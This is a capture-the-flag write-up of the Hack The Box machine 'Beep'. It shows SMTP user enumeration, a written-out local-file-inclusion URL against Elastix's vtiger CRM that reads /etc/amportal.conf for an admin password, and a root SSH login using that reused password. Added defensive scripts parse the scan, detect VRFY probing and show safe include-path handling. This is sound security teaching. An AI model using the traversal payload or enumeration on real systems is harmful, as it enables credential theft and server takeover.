Hack The Box: Beep


Enumeration


nmap reveals 12 open ports: 22, 25, 80, 110, 111, 143, 443, 993, 995, 3306, 4445 and 10000.

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.68.60/
110/tcp   open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            938/udp   status
|_  100024  1            941/tcp   status
143/tcp   open  imap?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-11-10T11:35:47+00:00; +59m59s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| http-robots.txt: 1 disallowed entry 
|_/
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_mysql-info: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1
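A scan like this is easier to act on once it is structured. The script below is an added example, not part of the original write-up: it parses an excerpt of the nmap output above into one record per port and flags what a defender would fix first, namely the end-of-life OpenSSH and Apache httpd 2.2 releases, the 1024-bit DSA host key, the certificate on 443 that had already expired at the time nmap reports in ssl-date, the exposed Webmin interface, and the services nmap could not identify. The finding texts and the "weak key" thresholds are my own choices, not nmap's.

```python
import re
from datetime import datetime
from typing import List, Optional, Tuple

# Excerpt of the nmap -sV output from the scan above, embedded so the script
# runs offline. Only the line types the parser handles are kept.
NMAP_OUTPUT = """\
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.68.60/
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-11-10T11:35:47+00:00; +59m59s from scanner time.
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
3306/tcp  open  mysql?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HOSTKEY_RE = re.compile(r"^\|_?\s+(\d+) [0-9a-f:]+ \((\w+)\)")
NOT_AFTER_RE = re.compile(r"^\|_?Not valid after:\s+(\S+)")
SSL_DATE_RE = re.compile(r"^\|_ssl-date:\s+(\S+)")


def parse_nmap(text: str) -> Tuple[List[dict], Optional[datetime]]:
    """One record per port; script lines (starting with '|') are attached to
    the most recently seen port. Returns the records and the ssl-date time."""
    services: List[dict] = []
    current: Optional[dict] = None
    scan_time: Optional[datetime] = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(),
                       "hostkeys": [], "cert_not_after": None}
            services.append(current)
            continue
        if current is None:
            continue
        if (m := HOSTKEY_RE.match(line)):
            current["hostkeys"].append((int(m.group(1)), m.group(2)))
        if (m := NOT_AFTER_RE.match(line)):
            current["cert_not_after"] = datetime.fromisoformat(m.group(1))
        if (m := SSL_DATE_RE.match(line)):
            # Keep the naive "YYYY-MM-DDTHH:MM:SS" part so it compares with the
            # certificate dates, which nmap prints without a time zone.
            scan_time = datetime.fromisoformat(m.group(1)[:19])
    return services, scan_time


def assess(services: List[dict], scan_time: Optional[datetime]) -> List[Tuple[int, str]]:
    """Flag the conditions a defender would want to fix first."""
    findings: List[Tuple[int, str]] = []
    for s in services:
        port, version = s["port"], s["version"]
        if s["service"].endswith("?"):
            findings.append((port, "service not identified by probes; verify manually"))
        if version.startswith("OpenSSH 4."):
            findings.append((port, "end-of-life OpenSSH release"))
        for bits, ktype in s["hostkeys"]:
            if ktype == "DSA" or (ktype == "RSA" and bits < 2048):
                findings.append((port, f"weak {bits}-bit {ktype} host key"))
        if "Apache httpd 2.2" in version:
            findings.append((port, "end-of-life Apache httpd 2.2 branch"))
        if "Webmin" in version:
            findings.append((port, "Webmin administration interface exposed"))
        expiry = s["cert_not_after"]
        if expiry is not None and scan_time is not None and expiry < scan_time:
            findings.append((port, f"TLS certificate expired on {expiry.date()}"))
    return sorted(findings)


if __name__ == "__main__":
    svcs, when = parse_nmap(NMAP_OUTPUT)
    for port, msg in assess(svcs, when):
        print(f"{port:>6}  {msg}")
```

The expiry check only works because nmap's ssl-date line gives the server's clock at scan time; without it the script would have to fall back to the local clock, which is exactly the comparison that goes wrong when the scanner and target clocks drift as they do here (+59m59s).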

Visiting the website on port 80 redirects to HTTPS, where the browser shows an SSL error:

[Screenshot: browser SSL error on https://10.129.68.60/]

We need to manually enable TLS 1.0 in the browser to view the page. After that, we can see a login screen:

[Screenshot: Elastix login page]

I tried some default passwords, but with no success.
After that, I tried to connect to the SMTP port with telnet. I discovered that the domain is beep.localdomain and that we have a user root on the machine:

$ telnet 10.129.68.60 25
Trying 10.129.68.60...
Connected to 10.129.68.60.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

Metasploit's smtp_enum module found the following additional users:

msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.129.68.60:25       - 10.129.68.60:25 Banner: 220 beep.localdomain ESMTP Postfix
[+] 10.129.68.60:25       - 10.129.68.60:25 Users found: , adm, bin, daemon, dbus, fax, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mysql, news, nobody, ntp, operator, postfix, postgres, postmaster, rpc, rpcuser, shutdown, sshd, sync, uucp, webmaster, www
[*] 10.129.68.60:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
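Neither the manual VRFY probe nor the module leaves much trace in a mail log unless someone looks for it. The script below is an added example, not part of the original post: it runs over constructed Postfix-style smtpd log lines (the addresses, PIDs and timestamps are made up) and reports any source that probed several distinct local names with VRFY or EXPN inside a short window, which is the pattern of the enumeration above. The regex assumes Postfix's default "NOQUEUE: reject:" log shape.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed Postfix-style log lines (not taken from the box). One source
# walks through several names with VRFY, another issues a single VRFY, and a
# third gets an ordinary RCPT reject, which is normal bounce traffic.
MAIL_LOG = """\
Nov 10 11:40:01 beep postfix/smtpd[2211]: connect from unknown[10.10.14.31]
Nov 10 11:40:02 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=SMTP
Nov 10 11:40:02 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table; to=<test> proto=SMTP
Nov 10 11:40:03 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <guest>: Recipient address rejected: User unknown in local recipient table; to=<guest> proto=SMTP
Nov 10 11:40:03 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <support>: Recipient address rejected: User unknown in local recipient table; to=<support> proto=SMTP
Nov 10 11:40:04 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <sales>: Recipient address rejected: User unknown in local recipient table; to=<sales> proto=SMTP
Nov 10 11:40:04 beep postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.10.14.31]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=SMTP
Nov 10 11:52:10 beep postfix/smtpd[2302]: NOQUEUE: reject: VRFY from mail.example.net[192.0.2.10]: 550 5.1.1 <billing>: Recipient address rejected: User unknown in local recipient table; to=<billing> proto=ESMTP
Nov 10 11:53:00 beep postfix/smtpd[2305]: NOQUEUE: reject: RCPT from relay.example.org[198.51.100.7]: 550 5.1.1 <nobody2>: Recipient address rejected: User unknown in local recipient table; from=<a@example.org> to=<nobody2@beep.localdomain> proto=ESMTP
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: (?P<cmd>\w+) from \S+\[(?P<ip>[\d.]+)\]: "
    r"\d{3} [\d.]+ <(?P<addr>[^>]*)>"
)


def detect_vrfy_enumeration(log_text: str, threshold: int = 5,
                            window_seconds: int = 60) -> Dict[str, int]:
    """Return {source_ip: distinct_names} for every source that probed at
    least `threshold` distinct local names with VRFY or EXPN inside any
    `window_seconds` window. RCPT rejects are deliberately ignored: a few of
    those are normal, whereas VRFY has no legitimate bulk use."""
    probes: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd") not in ("VRFY", "EXPN"):
            continue
        # Syslog timestamps carry no year; strptime defaults it, which is fine
        # because only differences between timestamps are used.
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        probes[m.group("ip")].append((ts, m.group("addr").lower()))

    alerts: Dict[str, int] = {}
    for ip, events in probes.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {addr for _, addr in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for ip, names in detect_vrfy_enumeration(MAIL_LOG).items():
        print(f"{ip}: probed {names} distinct local names with VRFY/EXPN")
```

Counting distinct names rather than raw attempts keeps a retried single lookup from tripping the alert. On the server side the fix is `disable_vrfy_command = yes` in Postfix's main.cf, after which VRFY answers 502 for every name and the 252/550 difference that made the enumeration above possible disappears.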

I also tested the MySQL remote login, but it didn’t work:

$ mysql -h 10.129.68.60 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '10.10.14.31' is not allowed to connect to this MySQL server

Unfortunately, I couldn’t get gobuster to run because of the TLS issue, even with the no-tls-verification flag. Next, I started looking for exploits for Elastix and found an RCE on searchsploit, which sends a reverse shell via the sub-URL /recordings/misc/callme_page.php. I tested whether this URL exists and got an empty page, so it seems to. After a little clicking around, I also found an admin panel and another login page.

[Screenshot: Elastix admin panel and second login page]

At this point, I tried several RCE exploits, with Python, a browser, curl and Metasploit, but all of them failed. So I moved on to another exploit: local file inclusion. The Perl script on searchsploit shows a sample URL that discloses the contents of a local file:

https://10.129.68.60//vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

The disclosed file, /etc/amportal.conf, contains the administrator password in plaintext.

[Screenshot: contents of /etc/amportal.conf with the admin password]
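The usual reason a payload like the one above works is that the application appends a fixed suffix such as `.php` to an unchecked parameter: the `%00` is a null byte that, on older PHP, ended the file name before the suffix was reached, and the `../` segments walk out of the intended directory. The Python below is an added example, not code from Elastix or vtiger CRM (the LANG_DIR location is a hypothetical stand-in): it mirrors the flawed path construction to show which file the page's payload resolves to, and places the hardened version beside it. Nothing is read from disk.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Hypothetical include directory; only used to build paths, never read.
LANG_DIR = "/var/www/html/vtigercrm/include/language"
# Allowed shape of a language code, e.g. en_us.
SAFE_LANG = re.compile(r"[a-z]{2}_[a-z]{2}")
# The current_language value from the URL above, URL-decoded so %00 becomes
# a real NUL byte.
PAYLOAD = unquote("../../../../../../../..//etc/amportal.conf%00")


def resolved_include_path_unsafe(current_language: str) -> str:
    """Mirror the flawed pattern: user input is concatenated into a path and a
    fixed extension is appended. Older PHP handled file names as C strings, so
    everything from the first NUL byte on (including ".php") was dropped, and
    "../" segments escape LANG_DIR. Returns the path that would be opened."""
    raw = LANG_DIR + "/" + current_language + ".php"
    truncated = raw.split("\x00", 1)[0]
    return os.path.normpath(truncated)


def resolved_include_path_safe(current_language: str) -> Optional[str]:
    """Hardened form: allowlist the parameter's shape first (this alone rejects
    NUL bytes, slashes and dots), then confirm the normalised path is still a
    direct child of LANG_DIR. In production, compare os.path.realpath() of the
    existing file as well so symlinks cannot point outside the directory."""
    if not SAFE_LANG.fullmatch(current_language):
        return None
    path = os.path.normpath(LANG_DIR + "/" + current_language + ".php")
    if os.path.dirname(path) != os.path.normpath(LANG_DIR):
        return None
    return path


if __name__ == "__main__":
    print("unsafe resolves payload to:", resolved_include_path_unsafe(PAYLOAD))
    print("safe resolves payload to:  ", resolved_include_path_safe(PAYLOAD))
    print("safe resolves en_us to:    ", resolved_include_path_safe("en_us"))
```

The allowlist is the control that matters; the directory check is defence in depth for the day someone relaxes the pattern. Rejecting the request outright (returning None) is preferable to "cleaning" the input, because a sanitiser that strips `../` or NUL bytes is easy to get subtly wrong.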

We can log in to Elastix with that password, and the same password is reused for the root account. Because the server's SSH daemon only offers legacy key exchange and host key algorithms (SHA-1 DH group exchange and ssh-dss) that current OpenSSH clients disable by default, we have to enable them explicitly on the client in order to log in:

$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.129.68.60

And with that, we are logged in as root.